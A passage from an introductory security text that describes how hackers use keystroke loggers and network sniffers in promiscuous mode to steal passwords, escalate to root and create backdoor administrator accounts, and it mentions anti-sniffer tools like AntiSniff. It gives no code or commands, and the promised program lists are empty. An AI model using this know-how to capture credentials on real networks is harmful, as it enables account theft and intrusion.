Another component of a rootkit is a sniffer or a keystroke logger, which the hacker can plant on a system to snare passwords, credit card numbers, or other valuable information transmitted across the network. A hacker may install a keystroke logger on one or more computers, though this increases the chance that the keystroke logger program may be detected.

Sniffers are less obvious because a hacker only needs to install it on one computer and then set that computer's network interface card (NIC) to promiscuous mode. Normally, each computer on the network only peeks at traffic specifically addressed to that computer, but when set in promiscuous mode, the computer peeks at any data passing through.

Once the sniffer retrieves one or more passwords, the hacker can use those valid passwords to hijack a legitimate user's account. Now the hacker can enter the computer under the disguise of a legitimate user, even in the middle of the night on a weekend when few legitimate users would be on the system. As a seemingly legitimate user, a hacker can leisurely browse a computer to better understand the software being used and the configuration of the network.

If the sniffer happens to snare the password of a system administrator, the hacker can use the system administrator's account to gain root access. With root access, the hacker can create additional accounts, even accounts with system administrator privileges, so the hacker can get back into the computer through a phony "legitimate" account later.

To learn more about the capabilities of sniffers, take a look at these programs:








Sniffers actually have legitimate users for analyzing and fixing a network. However, few people want a total stranger running a sniffer on their network. Rather than check to see if a computer's NIC card may be running in promiscuous mode, system administrators can run a variety of anti-sniffer tools (such as AntiSniff, shown in Figure 13-2) to help them find any rogue sniffers running on their network. Here are a few anti-sniffer programs:

Click To expand Figure 13-2: The AntiSniff program can check for hidden sniffers on a network.




The sentinel project